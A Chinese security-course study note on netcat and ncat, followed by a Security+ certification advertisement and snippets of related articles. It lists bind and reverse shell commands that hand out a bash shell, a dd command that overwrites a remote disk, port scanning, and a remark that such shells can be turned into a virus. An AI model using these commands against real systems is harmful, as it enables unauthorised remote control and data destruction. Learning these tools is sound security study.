【安全牛学习笔记】常用工具-NETCAT

一.NETCAT的功能

1.NETCAT--NC 跨平台 网络工具中的瑞士军刀 身材小巧 能力非凡

(1)侦听模式/传输模式

1.连接邮箱

ping pop.sina.com 找到新浪邮箱的ip

nc -vn ip 110

连接到邮箱之后登陆即可

pop默认需要base64:

打开shell

输入 base64

输入 字符

回车 Ctrl+D 得到转码后的字符

smtp邮箱不需要转码成64

2.连接Metasploit

nc -nv  (Metasploit)IP 80

发送http请求获取网页信息

(2)telnet/获取banner信息

(3)传输文本信息

两台kali 之间互相连接

A:nc -l -p port 打开并侦听port端口 A作为服务器

B:nc -nv ip port   B作为客户端

可作为远程电子取证

尽量少的修改服务器的内容

ls -l | nc -nv ip port

nc -l -p port > ps.txt 将远程传输过来的信息输出到ps.txt

ps aux | nc -nv ip port -q 1     命令-q 1 等待1s后退出

(4)传输文件/目录

传输文件:

A: nc -lp port>1.mp4             接收端

B: nc -nv ip port <1.mp4 -q 1 发送端

A: nc -lp port < 1.mp4 -q 1     发送端

B: nc -nv ip port > 2.mp4        接收端

文件后缀名一致即可

传输目录:

A: tar -cvf - music/ | nc -lp port -q 1

B: nc -nv ip port | tar -xvf -

思路:将目录打包 接收到之后 再解包

(5)加密传输文件

A: nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m

ecb > 1.mp4                                接收端

B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 |

nc -nv ip port -q 1                        发送端

思路:利用操作系统的加密功能 需要自己安装mcrypt

(6)远程控制木马

(7)加密所有流量

(8)流媒体服务器

A: cat 1.mp4 | nc -lp port

B: nc -nv ip port | mplayer -vo x11 -cache 3000 -

思路:传输视频流 并使用mplayer 播放器播放

mplayer 需要自己安装

(9)远程克隆硬盘

A: nc -lp port | dd of=/dev/sda

B: dd if=/dev/sda | nc ip port -q 1

(10)端口扫描

nc -nvz ip 1-65535

扫描所有开放的端口

默认使用tcp端口

nc -nvzu ip 1-1024

扫描UDP端口

每一个扫描器的扫描结果都不可能是完全正确的

(11)远程控制 (-c bash 的是被控制的一方)

正向:

A: nc -lp 333 -c bash

B: nc -nv ip port

反向:

A:nc -lp port

B:nc -nv ip port -c bash

注:windows用户把bash改成cmd

可以作为系统服务,写作病毒,进行远程操控

二.NetCat的缺陷

1.NC缺乏加密和身份验证的能力

使用的是明文传输

2.每个版本的NC参数都不同

三.Ncat介绍

1.Ncat弥补NetCat的缺陷

2.Ncat包含于nmap工具包中

3.远程控制

A: ncat -c bash --allow ip -vnl port --ssl 被控制

B: nct -nv ip port --ssl

先进行密钥的交换,然后对会话使用 ssl加密

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?

原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

原因二: IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证.

时间: 2024-11-07 08:05:04

【安全牛学习笔记】常用工具-NETCAT的相关文章

学习笔记-性能测试-工具篇-LR-初识

关于LR的基本信息网上都能搜到,这里就不再赘述. loadrunner的安装准备 windows环境: 前提条件: 内存:2G,硬盘空闲空间10G,安装完成后实际只占不到2G 支持winXP  SP3;32位与64位win7浏览器支持IE6-8,IE9,firefox3 若以前安装过LoadRunner,则将其卸载. 下载好需要的部件然后通过安装程序进行安装 关于破解细节,详情请百度或者谷歌. 这里找到一篇关于LR11的安装篇: http://www.cnblogs.com/yangxia-te

学习笔记-性能测试-工具篇-LR-12的安装

进入LR的官方网站下载好最新的两个版本 两个安装文件: 先解压到同一文件夹 点击安装程序,选择安装的路径会自动安装: 安装完成后出现三个主要组件: 学习笔记-性能测试-工具篇-LR-12的安装,布布扣,bubuko.com

树莓派学习笔记——交叉编译工具链

0.前言 [1]为什么要使用交叉编译 交叉编译工具较快开发的速度.树莓派中已经安装了gcc工具链,可在树莓派中直接编译源代码生成可执行文件.于此同时,PC机上也可使用gcc工具链生成可执行代码,但是和树莓派上的gcc工具不同,PC机上的gcc工具生成intel或amd芯片上可执行的代码,但树莓派却是arm系列的芯片,显然存在不小的差异.那么使用交叉工具链便可在PC机上开发树莓派中可执行程序. 虽然树莓派的主频可达700MHz远高于一般的嵌入式系统,但相比于PC机其性能还是差些,使用交叉工具链可节

c/c++unix/linux基础学习笔记-常用命令和vi的使用

linux 基本命令的使用-命令在ubuntu下面执行,有些命令通用其他linux,有些不通用. 多条命令间用;号隔开,回车后可以一起执行. clear-前屏,pwd显示当前目录,cd跳转目录. sudo [命令]  -ubuntu 下以管理员身份运行命令. 一般情况下,运行当前目录下的程序,要用 ./文件名 执行. 查看当前shell名称:ps 进入另外一个shell,直接输入shell名称:ksh/tcsh/sh/bash,退出一个shell用:exit. 切换shell命令,如:exec

oracle进阶笔记-常用工具的使用-oracle sql developer

oracle sql developer 类似于plsqldeveloper 下载地址;http://www.oracle.com/technology/products/database/sql_developer/index.html 安装工具 解压就OK 打开 首先必须建立一个对数据库连接 1 连接名(任意) oracle11g_connect 输入账户名sys 密码 oracle 连接方式 基本 角色 sysdba 主机名: 数据库服务器主机名或者ip地址 192.168.3.1 侦听的

【安全牛学习笔记】基本工具-NETCAT(telnet/banner、传输文本信息)

常用工具 经常使用且功能强大 安全从业者必不可少的帮手 Nc / ncat Wireshack Tcpdump NETCAT-----NC 网络工具中的瑞士军刀--小身材.大智慧 侦听模式/传输模式 telnet/获取banner信息 传输文本信息 传输文件目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬盘 NC-----TELNET/banner nc -nv 1.1.1.1 10 nc -nv 1.1.1.1 25 nc -nv 1.1.1.1 80 root:~#

非专业码农 JAVA学习笔记 6java工具类和算法-string

续<非专业码农 JAVA学习笔记 5 java工具类和算法> 五.字符串string 字符串和字符的差别:字符串双引号括起来”n”,字符用单引号括起来,表示一种符号’\n’ 1.string的主要方法和属性 类 方法或者属性 备注 定义string Stirng s=new string(“值”),string s=”值” 属性 string.length:string的长度为字节 方法startswith,endswith s.startwith(“值”)-以值为开头,s.endswith(

【安全牛学习笔记】WPS及其他工具

[email protected]:~# service network-manager stop [email protected]:~# airmon-ng check killKilling these processes: PID Name  765 dhclient  988 wpa_supplicant 先打上面的两个命令,把网卡映射到虚拟机,记住这个顺序 [email protected]:~# ifconfig            //看不到网卡 [email protecte

【安全牛学习笔记】Burpsuite-repeater,Sequencer,编码,代理截断工具

Burpsuite-----repeater Repeater Request History Change request method Change body encoding Copy as curl command Convert selsction Repeater菜单 Engagement tools-----generate csrf PoC Follow redirections Process cookies in redirections Burpsuite-----Sequ